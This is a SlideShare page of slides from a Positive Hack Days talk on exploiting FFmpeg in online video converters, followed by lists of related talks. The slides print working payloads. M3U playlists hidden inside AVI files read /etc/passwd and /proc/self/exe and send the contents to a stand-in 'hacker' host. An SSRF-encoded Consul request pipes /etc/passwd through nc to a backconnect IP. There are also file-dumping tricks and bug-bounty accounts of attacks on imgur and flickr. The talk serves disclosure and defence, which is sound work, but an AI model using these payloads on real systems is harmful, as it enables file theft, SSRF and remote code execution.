SlideShare ist ein Scribd-Unternehmen logo

Атаки на видеоконвертеры: год спустя

Positive Hack Days
Positive Hack Days

На BlackHat 2016 был представлен доклад об уязвимостях в видеосервисах. Докладчики продолжили исследования в этой области и расскажут о новых уязвимостях (логических и бинарных) и интересных способах их эксплуатации. Также расскажут реальные истории эксплуатации этих уязвимостей в программах bug bounty.

Technologie
1 von 66
Attacks on video converters: a year later Emil Lerner Pavel Cheremushkin
Who we are? Emil Lerner ● MSU CMC postgraduate ● Bushwhackers CTF team ● uses emacs as IDE Pavel Cheremushkin ● MSU CMC graduated bachelor ? ● Bushwhackers CTF team ● @__paulch on twitter ● uses vim as IDE
FFmpeg How a videoservice works
FFmpeg (on target server) Attack model
- Maxim Andreev, Mail.Ru Meetup 2016 - “Viral Video” by Maxim Andreev & Nikolay Ermiskin, BlackHat USA 2016 Previous work
M3U playlists #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://internal.host/api/method #EXT-X-ENDLIST “Viral Video”, BH USA 2016
M3U playlists: reading responses and files #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/prefix.m3u #EXTINF:1.0, file:///etc/passwd #EXT-X-ENDLIST “Viral Video”, BH USA 2016 #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/read? prefix.m3u:
“Viral Video”, BH USA 2016 #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/read?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... Segments concatenated:
Fixes ● proto limited to http:// and file:// ● same protocol for segments and playlist ● nesting limited
Format validation
AVI GAB2 chunk: subtitles
AVI GAB2 chunk: not only subtitles
Format validation: bypass
<AVI header+GAB2 header> #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/prefix.avi #EXTINF:1.0, <interesting url> #EXTINF:1.0, http://hacker/footer.avi #EXT-X-ENDLIST <AVI fake body + footer> <AVI header+GAB2 header> #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/read? prefix.avi: file_for_upload.avi:
<AVI header+GAB2 header> #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/read?<interesting data line 1> <interesing data> #EXT-X-ENDLIST <AVI fake body + AVI footer> segments concatenated:
Bug bounty story #1 (imgur.com)
Bug bounty story #1 (imgur.com)
Bug bounty story #1 (imgur.com) ● M3U and SSRF works ● response read (via M3U inside AVI) works too
Bug bounty story #1 (imgur.com) ● hosted on AWS ● AWS keys from metadata api didn’t work :( ● http://169.254.169.254/latest/user-data mentions “Consul”
Bug bounty story #1 (imgur.com): Consul
Bug bounty story #1 (imgur.com): Consul /v1/agent/self HTTP/1.1 Connection: Keep-Alive PUT /v1/kv/_rexec/<CONSUL_SESSION_ID>/job HTTP/1.1 Content-Length: 86 {"Wait": 2000000000, "Command": "cat /etc/passwd | nc <BACKCONNECT_IP> 31337"}PUT /v1/event/fire/_rexec HTTP/1.1 Content-Length: 71 {"Prefix": "_rexec", "Session": "<CONSUL_SESSION_ID>"}
Bug bounty story #1 (imgur.com): Consul http://127.0.0.1:8500/v1/agent/self%20HTTP/1.1%0D%0AConnection%3A %20Keep-Alive%0D%0A%0D%0APUT%20/v1/kv/_rexec/<CONSUL_SES SION_ID>/job%20HTTP/1.1%0D%0AContent-Length%3A%2086%0D%0 A%0D%0A%7B%22Wait%22%3A%202000000000%2C%20%22Comma nd%22%3A%20%22cat%20/etc/passwd%202%3E%261%20%7C%20nc %20BACKCONNECT_IP%2031337%22%7DPUT%20/v1/event/fire/_rexe c%20HTTP/1.1%0D%0AHost%3A%20consul%0D%0AContent-Length%3 A%2071%0D%0A%0D%0A%7B%22Prefix%22%3A%20%22_rexec%22 %2C%20%22Session%22%3A%20%22<CONSUL_SESSION_ID>%22% 7D
Bug bounty story #1 (imgur.com): RCE
Binary vuln. vs Logical vuln.
Fuzzing FFmpeg ● Google Research “FFmpeg and a thousand fixes” by Mateusz Jurczyk and Gynvael Coldwind ● oss-fuzz by Google ● Open Broadcast Systems ● ... $ git log | egrep -c 'Jurczyk|Coldwind' 1372
FFmpeg Workflow
FFmpeg Workflow
Fuzzing network code ● hook network functions (connect, send/recv) ● known & popular approach ● tools exist (e.g. preeny)
Problems of RL remote exploitation It’s easy because… ● A lot of ROP gadgets ● A lot of functions in @plt ● Choose your own exploitation method! It’s hard because… ● No binary knowledge ● No system knowledge (ASLR, libc version, etc.) ● Can’t debug remote exploit ● Command line params ● ...
HTTP Exploit (CVE-2016-10190) function@plt(arg1, arg2, arg3);
RTMP Exploit (CVE-2016-10191)
RTMP Exploit (CVE-2016-10191)
RTMP Exploit (CVE-2016-10191)
Bug bounty story #2 (flickr.com) ● format validator bypassed via M3U AVI ● old FFmpeg version ● can read local files and fire SSRF requests
<AVI header+GAB2 header> #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/prefix.avi #EXTINF:1.0, file:///proc/self/exe #EXTINF:1.0, http://hacker/footer.avi #EXT-X-ENDLIST <AVI fake body + footer> <AVI header+GAB2 header> #EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, http://hacker/read? prefix.avi: file_for_upload.avi:
... #EXTINF:1.0, #EXT-X-BYTERANGE: <size>@<offset> file:///proc/self/exe ... file_for_upload.avi:
... #EXTINF:1.0, #EXT-X-BYTERANGE: <size>@<offset> file:///proc/self/exe ... file_for_upload.avi: can’t read 0x00, 0x0a, 0x0d
... #EXTINF:1.0, #EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key" file:///proc/self/exe ...
... #EXTINF:1.0, #EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key" file:///proc/self/exe ... read approx. 5 full blocks
... #EXTINF:1.0, #EXT-X-BYTERANGE: 1000@<offset> #EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key2" file:///proc/self/exe ...
... #EXTINF:1.0, #EXT-X-BYTERANGE: 1000@<offset> #EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key2" file:///proc/self/exe ... read full data
Bug bounty story #2 (flickr.com) 1. dump /proc/self/exe 2. adjust ropchains 3. fire rtmp:// request
Bug bounty story #2 (flickr.com)
Cool, but what if there’s no network?
Dump files directly to the video!
#EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, data:<format-header> #EXTINF:1.0, file:///etc/passwd #EXTINF:1.0, data:<format-footer> #EXT-X-ENDLIST
#EXTM3U #EXT-X-MEDIA-SEQUENCE:1 #EXTINF:1.0, data:<format-header> #EXTINF:1.0, file:///etc/passwd #EXTINF:1.0, data:<format-footer> #EXT-X-ENDLIST
... #EXTINF:1, #EXT-X-KEY:METHOD=AES-128, URI=/dev/zero #EXT-X-BYTERANGE: 16 /dev/zero ... = AES-1 0x00...00 (0x00...00)
... #EXTINF:1, #EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL> #EXT-X-BYTERANGE: 16 /dev/zero ... = AES-1 0x00...00 (0x00...00) ⊕<VAL>
... #EXTINF:1, #EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL> #EXT-X-BYTERANGE: 16 /dev/zero ... = AES-1 0x00...00 (0x00...00) ⊕<VAL> = <FMT HEADER>
... #EXTINF:1, #EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL> #EXT-X-BYTERANGE: 16 /dev/zero ... = AES-1 0x00...00 (0x00...00) ⊕<VAL> = <FMT HEADER> CONST
XBIN format ● ancient ● can draw symbols ● header length ≤ 16 bytes
AVI
AVI GAB2
AVI GAB2 M3U
AVI GAB2 M3U XBIN (via AES)
AVI GAB2 M3U XBIN header XBIN footer /etc/passwd
Bug bounty story #3 (Vk.com, tumblr, flickr again, …)
Bug bounty story #3: even Google!
Takeaways (for defender) ● FFmpeg must be sandboxed ○ there is no other way ○ don’t even ask “FFmpeg is one of those projects we trust to have RCE everywhere” Google security team
Takeaways (for hacker) ● video processing = $$$ our bounties ~ 25k$ https://github.com/neex/ffmpeg-avi-m3u-xbin
Thank you!

Empfohlen

LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
n|u - The Open Security Community
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
Neelu Tripathy
 

Empfohlen

LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
n|u - The Open Security Community
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
Neelu Tripathy
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
neexemil
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Introduction to html 5
Introduction to html 5Introduction to html 5
Introduction to html 5
Nir Elbaz
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Codeigniter framework
Codeigniter framework Codeigniter framework
Codeigniter framework
baabtra.com - No. 1 supplier of quality freshers
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
ColdFusionConference
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
Mikhail Egorov
 
[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers
OWASP
 
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE
 

Weitere ähnliche Inhalte

Was ist angesagt?

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Christian Schneider
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
Christopher Frohoff
 

Was ist angesagt? (20)

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Introduction to html 5
Introduction to html 5Introduction to html 5
Introduction to html 5
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Codeigniter framework
Codeigniter framework Codeigniter framework
Codeigniter framework
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 

Ähnlich wie Атаки на видеоконвертеры: год спустя

[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers
OWASP
 
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE
 
Microblogging via XMPP
Microblogging via XMPPMicroblogging via XMPP
Microblogging via XMPP
Stoyan Zhekov
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani
 
Hack.lu 09 ip-morph
Hack.lu 09 ip-morphHack.lu 09 ip-morph
Hack.lu 09 ip-morph
Steph Cliche
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
Amanpreet Singh
 

Ähnlich wie Атаки на видеоконвертеры: год спустя (20)

[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers[OWASP Poland Day] Application security - daily questions & answers
[OWASP Poland Day] Application security - daily questions & answers
 
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
CODE BLUE 2014 : Embedded Security in The Land of the Rising Sun by BEN SCHMI...
 
Advances in Open Source Password Cracking
Advances in Open Source Password CrackingAdvances in Open Source Password Cracking
Advances in Open Source Password Cracking
 
Microblogging via XMPP
Microblogging via XMPPMicroblogging via XMPP
Microblogging via XMPP
 
Ubuntu Core 技术详解
Ubuntu Core 技术详解Ubuntu Core 技术详解
Ubuntu Core 技术详解
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
12 tricks to avoid hackers breaks your CI / CD
12 tricks to avoid hackers breaks your CI / CD12 tricks to avoid hackers breaks your CI / CD
12 tricks to avoid hackers breaks your CI / CD
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
bettercap.pdf
bettercap.pdfbettercap.pdf
bettercap.pdf
 
Hyperkitty: Updating Mailman's UI
Hyperkitty: Updating Mailman's UIHyperkitty: Updating Mailman's UI
Hyperkitty: Updating Mailman's UI
 
Multicore
MulticoreMulticore
Multicore
 
Using Gource to visualize Linux kernel data
Using Gource to visualize Linux kernel dataUsing Gource to visualize Linux kernel data
Using Gource to visualize Linux kernel data
 
The internet of $h1t
The internet of $h1tThe internet of $h1t
The internet of $h1t
 
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
 
Online Sync meetup: Metasploit 101 slides
Online Sync meetup: Metasploit 101 slidesOnline Sync meetup: Metasploit 101 slides
Online Sync meetup: Metasploit 101 slides
 
Programming on Windows 8.1: The New Stream and Storage Paradigm (Raffaele Ria...
Programming on Windows 8.1: The New Stream and Storage Paradigm (Raffaele Ria...Programming on Windows 8.1: The New Stream and Storage Paradigm (Raffaele Ria...
Programming on Windows 8.1: The New Stream and Storage Paradigm (Raffaele Ria...
 
Hack.lu 09 ip-morph
Hack.lu 09 ip-morphHack.lu 09 ip-morph
Hack.lu 09 ip-morph
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 

Mehr von Positive Hack Days

Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
Positive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
Positive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
Positive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Positive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
Positive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
Positive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
Positive Hack Days
 

Mehr von Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Kürzlich hochgeladen

Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
